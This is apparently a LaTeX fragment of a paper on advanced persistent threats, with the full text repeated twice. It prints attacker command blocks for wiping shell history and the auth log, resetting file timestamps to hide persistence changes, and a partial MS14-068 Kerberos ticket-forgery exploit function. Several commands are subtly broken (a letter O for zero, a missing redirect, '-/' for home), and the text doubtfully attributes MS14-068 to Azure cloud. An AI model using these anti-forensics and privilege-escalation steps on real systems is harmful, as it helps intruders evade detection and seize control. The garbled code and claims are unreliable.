flaing/.tex

## .tex
Highly productive APT synthesizes phishing and social engineering practices for persistent purpose\cite{falliere2011w32, cardenas2011attacks, maiorca2019digital, urbina2016limiting}. They usually share similar strategic goals. History cleaning and faking can increase the impact of the goals.

An example of common history cleaning:
{\footnotesize
\begin{verbatim}

ln /dev/null -/.bash_history -sf # history to null
kill -9 $$ # kill session
history -c # clear session history
echo "" /var/log/auth.log # clear auth log
export HISTFILESIZE=O # length trick for history
export HISTSIZE=O # for command
unset HISTFILE # disable
\end{verbatim}
}
An example of trickier persistence:

{\footnotesize
\begin{verbatim}
## nologin passwd
## put authorizations in man, backup, daemon, bin.
## create crontabs for that.
SHELLS_TS=$(stat -c '%y' /etc/shells) # shell trick
# malicious logics and reset timestamps
touch -d "$SHELLS_TS"
  /lib/modprobe.d/ /media/cdrom1/
  /usr/local/lib /etc/tmux.cf
  /lib/modprobe.d/systemctrl.conf
  /media/cdrom1/debian.iso
  /usr/local/lib/python3.9
## now (/etc/passwd)(/usr/sbin/nologin) compromised
\end{verbatim}
}

Other than hardly detected history clearing and persistence, hackers can also bypass intrusion detection and prevention by gaining highest privilege. Even in a cloud environment, hackers could forge ticket to gain session key of domain administrator, such as CVE MS14-068 on Kerberos-based Azure cloud.

{\footnotesize
\begin{verbatim}
def sploit(user_realm, user_name,
  user_sid,user_key, kdc_a, kdc_b,
  target_realm, target_service,
  target_host, output_filename,
  krbtgt_a_key=None,
  trust_ab_key=None,
  target_key=None):
..
session_key =
  (int(as_rep_enc['key']['keytype']),
str(as_rep_enc['key']['keyvalue']))
\end{verbatim}
}
	Highly productive APT synthesizes phishing and social engineering practices for persistent purpose\cite{falliere2011w32, cardenas2011attacks, maiorca2019digital, urbina2016limiting}. They usually share similar strategic goals. History cleaning and faking can increase the impact of the goals.

	An example of common history cleaning:
	{\footnotesize
	\begin{verbatim}

	ln /dev/null -/.bash_history -sf # history to null
	kill -9 $$ # kill session
	history -c # clear session history
	echo "" /var/log/auth.log # clear auth log
	export HISTFILESIZE=O # length trick for history
	export HISTSIZE=O # for command
	unset HISTFILE # disable
	\end{verbatim}
	}
	An example of trickier persistence:

	{\footnotesize
	\begin{verbatim}
	## nologin passwd
	## put authorizations in man, backup, daemon, bin.
	## create crontabs for that.
	SHELLS_TS=$(stat -c '%y' /etc/shells) # shell trick
	# malicious logics and reset timestamps
	touch -d "$SHELLS_TS"
	/lib/modprobe.d/ /media/cdrom1/
	/usr/local/lib /etc/tmux.cf
	/lib/modprobe.d/systemctrl.conf
	/media/cdrom1/debian.iso
	/usr/local/lib/python3.9
	## now (/etc/passwd)(/usr/sbin/nologin) compromised
	\end{verbatim}
	}

	Other than hardly detected history clearing and persistence, hackers can also bypass intrusion detection and prevention by gaining highest privilege. Even in a cloud environment, hackers could forge ticket to gain session key of domain administrator, such as CVE MS14-068 on Kerberos-based Azure cloud.

	{\footnotesize
	\begin{verbatim}
	def sploit(user_realm, user_name,
	user_sid,user_key, kdc_a, kdc_b,
	target_realm, target_service,
	target_host, output_filename,
	krbtgt_a_key=None,
	trust_ab_key=None,
	target_key=None):
	..
	session_key =
	(int(as_rep_enc['key']['keytype']),
	str(as_rep_enc['key']['keyvalue']))
	\end{verbatim}
	}